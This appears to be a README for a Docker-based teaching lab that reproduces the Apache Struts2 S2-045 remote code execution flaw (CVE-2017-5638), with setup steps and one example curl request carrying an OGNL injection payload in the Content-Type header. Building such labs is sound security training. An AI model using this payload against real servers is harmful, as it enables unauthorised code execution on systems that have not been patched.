## https://sploitus.com/exploit?id=BC00A5DC-9267-5659-AB5C-4EDCB79C1B48
# Apache Struts2 S2-045 RCE (CVE-2017-5638)
## ๐ Overview
This project demonstrates the **Remote Code Execution (RCE) vulnerability** in Apache Struts2 (CVE-2017-5638).
Attackers can exploit a crafted HTTP `Content-Type` header to execute arbitrary system commands on vulnerable servers.
This repo uses **Vulhub Docker labs** to provide a safe environment to test and understand the vulnerability.
---
## ๐ Environment Setup
* **Host:** Ubuntu 24.04 (VirtualBox or Native)
* **Docker & Docker Compose**
* **Vulhub Lab**
* **Apache Struts2 version:** 2.3.30
---
## ๐ Getting Started
1๏ธโฃ **Clone this repo**
```bash
git clone https://github.com/soufiane-benchahyd/vulhub-struts2.git
cd vulhub-struts2/struts2/s2-045
```
2๏ธโฃ **Start the vulnerable container**
```bash
docker compose up -d
```
3๏ธโฃ **Verify container is running**
```bash
docker ps
```
You should see something like:
```
CONTAINER ID IMAGE COMMAND STATUS PORTS
xxxxxxx vulhub/struts2:2.3.30 "/usr/local/bin/mvn-โฆ" Up 0.0.0.0:8080->8080/tcp
```
4๏ธโฃ **Test the web interface**
Open your browser โ `http://:8080`
You should see the Struts2 application homepage.
> VM IP example: `192.168.56.101`
---
## ๐ป Exploitation
> โ ๏ธ Only perform exploitation in a **controlled lab environment**. Never attack public servers.
You can now test the RCE using scripts or tools like `curl` or Metasploit against the vulnerable container.
Example (replace `` with your test command):
```bash
curl -v -H "Content-Type: %{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Test','test')}" http://:8080/
```
---
## ๐ Notes
* This lab is **safe**: all actions occur inside Docker.
* Screenshots of your test can be added later to GitHub.
* You can extend this repo with **other Struts2 vulnerabilities** for a full learning portfolio.
---
## โก References
* [Apache Struts2 S2-045 CVE](https://vulners.com/cve/CVE-2017-5638)
* [Vulhub GitHub](https://github.com/vulhub/vulhub)